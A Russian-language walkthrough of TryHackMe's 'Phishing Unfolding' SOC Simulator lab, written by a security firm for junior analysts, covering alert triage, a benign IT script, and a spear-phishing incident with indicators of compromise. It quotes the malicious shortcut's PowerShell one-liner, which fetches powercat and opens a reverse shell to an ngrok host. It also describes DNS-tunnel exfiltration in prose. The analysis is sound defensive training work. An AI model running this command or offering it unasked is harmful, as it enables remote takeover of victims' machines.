Разбор задания Phishing Unfolding в SOC Simulator от TryHackMe (Phishing Unfolding SOC Simulator TryHackMe walkthrough)

INTRO

TryHackMe - отличная платформа для тренировки навыков в cybersecurity.

Мы в RTEAM используем эту платформу для быстрого погружения наших джуниоров и студентов во время практики. Совсем недавно на платформе появился новый раздел для тренировки навыков аналитиков - SOC Simulator.

Наша команда SOC прошла первое задание и готова поделиться прохождением. Думаем, это будет полезно для начинающих аналитиков, и всем, кто интересуется информационной безопасностью на практике.

ОПИСАНИЕ ЗАДАНИЯ

Перейдем к описанию первого задания.

TryHatMe - одна из самых быстрорастущих компаний в индустрии электронной коммерции, специализирующаяся на онлайн-продаже головных уборов. Их уникальное ценностное предложение, которое позволяет клиентам виртуально "примерять" головные уборы перед покупкой, выделило их на рынке и способствовало быстрому росту.

Список активов:

Michael Ascot, CEO [email protected] Logged-in host: win-3450
Sophie J, HR [email protected] Logged-in host: win-3461
Michelle Smith, Legal [email protected] Logged-in host: win-3459
Roger Fedora, Marketing [email protected] Logged-in host: win-3460
Yani Zubair, IT [email protected] Logged-in host: win-3449
Miguel O'Donnell, Sales [email protected] Logged-in host: win-3451
Cain Omoore, Sales [email protected] Logged-in host: win-3452
Kyra Flores, Sales [email protected] Logged-in host: win-3453
Amna Espinoza, Sales [email protected] Logged-in host: win-3454
Ashwin Johnston, Sales [email protected] Logged-in host: win-3455
Safa Prince, Sales [email protected] Logged-in host: win-3456
Diego Summers, Sales [email protected] Logged-in host: win-3457
Armaan Terry, Sales [email protected] Logged-in host: win-3458

В сценарии "Phishing Unfolding" мы в роли Аналитика SOC столкнемся в с фишинговой атакой лицом к лицу в режиме реального времени. Наша задача — анализировать поступающие алерты, выявлять ключевые этапы атаки и реагировать, собирая информацию в отчеты. Успех зависит от способности отличить настоящие угрозы (true positive) от ложных срабатываний (false positive) и грамотно управлять своим временем.

ИНСТРУМЕНТЫ ДЛЯ АНАЛИЗА

Для выполнения задачи в нашем распоряжении IRP-портал, включающий несколько ключевых инструментов:

Alert Queue - наш основной рабочий инструмент, где собираются все уведомления о подозрительных действиях. Интерфейс позволяет быстро переходить к анализу каждого алерта, расставлять приоритеты и брать на себя их обработку.

SIEM (Splunk) - центр анализа логов и событий. Здесь мы сможем находить подтверждения угроз, исследовать индикаторы компрометации и выявлять связи между событиями.

Analyst VM - Изолированное рабочее пространство, где собраны все артефакты для углубленного анализа: подозрительные файлы, скрипты PowerShell, журналы DNS-запросов и многое другое. Здесь мы сможем детально изучить подозрительную активность.

Dashboard - Удобный инструмент для мониторинга нашей работы. Он показывает статистику по обработанным алертам, делит их на true positive и false positive, а также дает общую картину нашей эффективности.

Сценарий начинается с изучения алертов, где мы берем на себя обработку уведомления. Это действие запускает таймер MTTR (среднее время на решение), поэтому действовать нужно оперативно. Мы будете использовать SIEM для поиска дополнительной информации и Analyst VM для детального анализа подозрительных данных. Совместив все данные, мы должны подтвердить или опровергнуть угрозу, а затем четко задокументировать свои выводы.

Ключевая цель — не только закрыть все true positive алерты, но и подготовить детализированный отчет. По завершении сценария мы получим обратную связь о проделанной работе, включая подробный анализ MTTR (Mean Time to Respond), количество обработанных алертов и рекомендации для улучшения профессиональных навыков.

АНАЛИЗ СОБЫТИЙ

Скрипт от IT специалиста Yani Zubair

TICKET 1003

Status: False Positive

8:06:13 AM: сотрудник IT Yani Zubair ([email protected]) отправил письмо с темой "Force Update Fix". Вложенный файл forceupdate.ps1 был загружен Michelle Smith из юридического отдела на её хост win-3459.

<#
.SYNOPSIS
This script was crafted by the one and only Yani Zubair from IT. Contact him at [email protected] for all your tech needs!

.DESCRIPTION
This script automates Windows updates and performs various system diagnostics for troubleshooting. The generated files are saved in the output folder and can be sent via email if needed.

.NOTES
Author: Yani Zubair
Contact: [email protected]
#>

Write-Host "Greetings, tech warriors! This script, artfully crafted by Yani Zubair from IT, is here to save the day! Contact him at [email protected] for all your tech needs." -ForegroundColor Magenta

Write-Host "Starting Windows Update and System Diagnostics..." -ForegroundColor Green

# Install and import the PSWindowsUpdate module
Install-Module PSWindowsUpdate -Force -Scope CurrentUser
Import-Module PSWindowsUpdate

# Force Windows Update
Write-Host "Installing all available updates, this might take some time..." -ForegroundColor Green
Install-WindowsUpdate -AcceptAll -AutoReboot
Write-Host "Windows Update completed." -ForegroundColor Green

# System Diagnostics
$diagnosticsPath = "C:\Temp"
if (-Not (Test-Path $diagnosticsPath)) {
New-Item -Path $diagnosticsPath -ItemType Directory -Force
}

# Collecting System Information
Write-Host "Collecting System Information..." -ForegroundColor Green
Get-ComputerInfo > "$diagnosticsPath\SystemInfo.txt"
Write-Host "System Information collected."

# Collecting Network Configuration
Write-Host "Collecting Network Configuration..." -ForegroundColor Green
ipconfig /all > "$diagnosticsPath\NetworkConfig.txt"
Write-Host "Network Configuration collected."

# Collecting Installed Programs
Write-Host "Collecting Installed Programs..." -ForegroundColor Green
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate > "$diagnosticsPath\InstalledPrograms.txt"
Write-Host "Installed Programs collected."

# Collecting Running Processes
Write-Host "Collecting Running Processes..." -ForegroundColor Green
Get-Process | Sort-Object CPU -Descending | Select-Object -First 10 > "$diagnosticsPath\RunningProcesses.txt"
Write-Host "Running Processes collected."

Write-Host "All tasks completed. Diagnostics files are saved in $diagnosticsPath." -ForegroundColor Green

# Email generated files to Yani
Send-MailMessage -To "[email protected]" -From "[email protected]" -Subject "Windows Update and Diagnostics Report" -Body "Here are the files generated by the script." -Attachments "$diagnosticsPath\SystemInfo.txt", "$diagnosticsPath\NetworkConfig.txt", "$diagnosticsPath\InstalledPrograms.txt", "$diagnosticsPath\RunningProcesses.txt"

Этот скрипт оказался легитимным автоматизированным решением для обновлений Windows с возможностью отправки отчетов их IT специалисту. Хотя этот случай не привёл к инциденту, он демонстрирует важность проверки всех сценариев, даже от доверенных источников.

Фишинговое письмо

TICKET 1015

MITRE ATT&CK Phishing: Spear Phishing Attachment (T1566.001)

Status: True Positive

8:22:49 AM: CEO компании Michael Ascot ([email protected]) получил письмо от отправителя [email protected].

В письме находилось вложение — архив ImportantInvoice-February.zip размером 1 КБ. Архив содержал ярлык invioce.pdf.lnk, который маскировался под PDF-файл. Однако внутри ярлыка содержалась следующая вредоносная команда:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 2.tcp.ngrok.io -p 19282 -e powershell

Скрипт представляет из себя one-liner для скачивания и запуска в оперативной памяти Powershell скрипта powercat.ps1, и создания реверс шелла, используя сервис ngrok.

После открытия ярлыка процесс PowerShell был автоматически запущен, что привело к загрузке и выполнению Powercat, предоставив злоумышленнику доступ к системе. Получив реверс шелл, злоумышленник начал следующий этап атаки.

Разведка и эксфильтрация данных

После получения бэк-коннекта, злоумышленник использовал удалённый доступ для разведки и сбора данных с хоста Michael Ascot. Основные этапы развивались следующим образом:

MITRE ATT&CK Account Discovery: Domain Account (T1087.002)

8:31:15 AM: Был создан файл __PSScriptPolicyTest_hnpvwg1v.3mr.ps1, вероятно, для проверки разрешений на запуск специфичных PowerShell-скриптов. Это действие свидетельствует о попытке определить возможности дальнейшего использования PowerShell в системе.

8:32:23 AM: На подконтрольный хост загружен и выполнен скрипт PowerView.ps1, предназначенный для анализа инфраструктуры Active Directory. В логах SIEM зафиксирована активность фазы разведки, которая включает сбор данных о домене, пользователях и группах.

TICKET 1033

MITRE ATT&CK Collection: Data from Network Shared Drive (T1039)

8:34:11 AM: Злоумышленник создал директорию C:\Users\michael.ascot\Downloads\exfiltration на локальной машине. С помощью утилиты net.exe была примонтирована сетевая папка \\FILESRV-01\SSF-FinancialRecordsв качестве локального виртуального диска Z:.

Далее, с помощью Robocopy.exe, файлы из шары были скопированы локально на компьютер жертвы в ранее созданную директорию exfiltration.

TICKET 1039-1046, 1048-1049

MITRE ATT&CK Exfiltration Over Alternative Protocol: DNS (T1048.003)

8:35:16 AM: Чтобы скрыть следы активности, сетевое подключение к файловой шаре было отключено командой

net.exe use Z: /delete

8:35:34 AM: Собранные данные были упакованы в архив exfilt8me.zip. Для передачи данных злоумышленник предварительно закодировал архив в формате base64. Затем он применил метод DNS-туннелирования, осуществляя серию DNS-запросов с помощью nslookup.exe, запущенного из PowerShell. Закодированные данные были разбиты на блоки по 30 символов, которые передавались в качестве частей DNS-запросов.

ЧТО ПРОИЗОШЛО?

Данный инцидент является примером хорошо организованной многоэтапной атаки, включающей:

• Использование социальной инженерии для получения доступа к системе.
• Сбор информации об инфраструктуре компании с использованием PowerShell.
• Копирование конфиденциальной информации с сетевой шары.
• Передача данных через скрытые каналы (DNS-туннелирование).

Целенаправленные фишинговые атаки продолжают оставаться одним из наиболее эффективных инструментов компрометации корпоративных систем, особенно в сочетании с использованием легитимных инструментов и встроенных возможностей операционных систем, таких как PowerShell. Злоумышленники демонстрируют высокую эффективность в использовании этих инструментов для разведки, перемещения по сети и эксфильтрации данных, минимизируя вероятность обнаружения. Распространённость таких методов подчеркивает важность комплексного подхода к кибербезопасности, включая усиление политики доступа, мониторинг активности и постоянное повышение осведомленности сотрудников.

Индикаторы компрометации:

• 2[.]tcp[.]ngrok[.]io:19282
• hatmakereurope[.]xyz
• raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1
• ImportantInvoice-February[.]zip
• invoice[.]pdf[.]lnk
• exfilt8me[.]zip
• 145BB70ABD0CC625F4A7ADD8CFB08982C39C4573470C8B87DB41D755BD2F9EA0
• 50E5BF8361DF2442546F21E08B1561273F4CCC610258F622AC1A4B8EBF0A0386

Этот кейс ещё раз доказывает, что эффективная защита требует не только мониторинга, но и глубокого понимания действий атакующих.

В RTEAM мы совмещаем опыт Red Team и Blue Team, чтобы выявлять уязвимости и предлагать комплексные и надёжные решения для защиты бизнеса.

💼 Наши услуги: https://rteam.kz

📞 Контакт для связи: +7 775 999 91 09

✉️ E-mail: [email protected]